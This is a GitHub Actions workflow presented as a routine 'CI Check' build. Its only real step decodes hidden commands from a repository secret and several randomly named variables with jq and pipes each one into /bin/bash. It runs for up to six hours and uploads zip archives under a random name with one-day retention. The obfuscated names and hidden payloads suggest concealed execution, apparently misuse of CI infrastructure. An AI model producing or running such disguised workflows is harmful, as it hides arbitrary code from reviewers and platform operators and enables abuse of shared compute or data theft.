name: CI Check
on:
  workflow_dispatch:

permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          hw1: ${{ secrets.hw1 }}
        run: |
          printf '%s' "$hw1" | jq -r .fvy572 | /bin/bash
          echo $bsyy1 | jq -r .yz4 | /bin/bash
          echo $jzy2 | jq -r .krzk07692 | /bin/bash
          printf '%s' "$r8" | jq -r .kmb95 | /bin/bash
          printf '%s' "$v777" | jq -r .mv5 | /bin/bash
          printf '%s' "$q817" | jq -r .bx6 | /bin/bash
          printf '%s' "$wmzm90890" | jq -r .ndrec392 | /bin/bash
          printf '%s' "$oh9" | jq -r .eka67473 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 1uUoAGJU
          path: "*.zip"
          retention-days: 1
